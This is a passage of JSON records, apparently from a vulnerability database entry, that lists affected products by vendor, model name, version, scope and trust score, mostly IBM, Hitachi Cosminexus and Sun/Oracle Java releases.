"scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.30" }, { "model": "cosminexus application server enterprise version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "cosminexus application server standard version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "cosminexus developer standard version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "lotus symphony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.6" }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "cosminexus developer standard version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux enterprise server sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "cosminexus application server standard version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "cosminexus developer standard version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli policy driven software distribution", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus application server enterprise version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus symphony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.4" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "cosminexus application server version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.11" }, { "model": "cosminexus client version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "epolicy orchestrator", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "5.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server enterprise version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.44" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "jrockit r28.2.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "cosminexus developer version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "quickfile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.42" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "cosminexus developer professional version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus symphony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "vcenter server update1", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "powersc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "cosminexus developer light version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer standard version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "update manager update", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.51" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus developer light version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "tivoli storage productivity center fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.33" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server version 05-00-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus developer light version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "cosminexus application server enterprise version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus developer standard version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino 8.5.3fp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "lotus notes fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "cosminexus application server version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "linux enterprise server sp2 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "lotus widget factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.12" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "mac os update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.617" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus developer version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "lotus domino fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus client version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.0" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "lotus domino fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "quickfile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli netcool/impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.4" }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus developer light version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.29" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "smartcloud provisioning", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.1" }, { "model": "cosminexus developer light version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "os/400 v6r1m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "epolicy orchestrator", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.35" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.6" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.5" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.43" }, { "model": "cosminexus application server version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.19" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.31" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "rational insight ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.11" }, { "model": "ucosminexus client 06-71-/m", "scope": null, 